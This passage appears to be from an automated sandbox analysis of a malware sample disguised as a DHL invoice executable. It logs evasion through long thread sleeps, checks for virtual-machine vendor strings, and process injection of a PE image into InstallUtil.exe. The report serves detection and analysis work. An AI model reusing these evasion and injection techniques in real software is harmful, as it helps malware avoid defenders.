              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 9C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2410000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597686Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597342Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597107Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596996Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595638Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594269Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeWindow / User API: threadDelayed 868Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeWindow / User API: threadDelayed 2714Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8206Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1636Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 1908Thread sleep count: 868 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 1908Thread sleep count: 2714 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99546s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99327s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -99093s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98874s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98530s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98421s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exe TID: 4904Thread sleep time: -98299s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep count: 36 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -33204139332677172s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6704Thread sleep count: 8206 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6704Thread sleep count: 1636 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599437s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599109s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -599000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598781s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598672s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598234s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598125s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -598015s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597906s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597797s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597686s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597562s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597342s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -597107s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596996s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596765s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596656s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596547s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596312s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596203s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -596094s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595638s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595515s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595406s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595297s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595187s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -595078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -594969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -594859s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -594750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -594390s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6168Thread sleep time: -594269s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99765Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99546Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99437Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99327Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99218Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 99093Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98984Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98874Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98750Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98640Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98530Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98421Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeThread delayed: delay time: 98299Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597686Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597342Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597107Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596996Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595638Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595515Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594390Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594269Jump to behavior
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: InstallUtil.exe, 00000004.00000002.2940130567.000000000268E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd21e85383b951<
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2036269794.0000000002409000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: InstallUtil.exe, 00000004.00000002.2938751180.000000000069F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyp
              Source: Invoice DHL - AWB 2024 E4001 - 0000731.exe, 00000000.00000002.2035150985.000000000064B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4_2_05D97B70 LdrInitializeThunk,4_2_05D97B70
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 420000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 420000Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 442000Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3D6008Jump to behavior
              Source: C:\Users\user\Desktop\Invoice DHL - AWB 2024 E4001 - 0000731.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
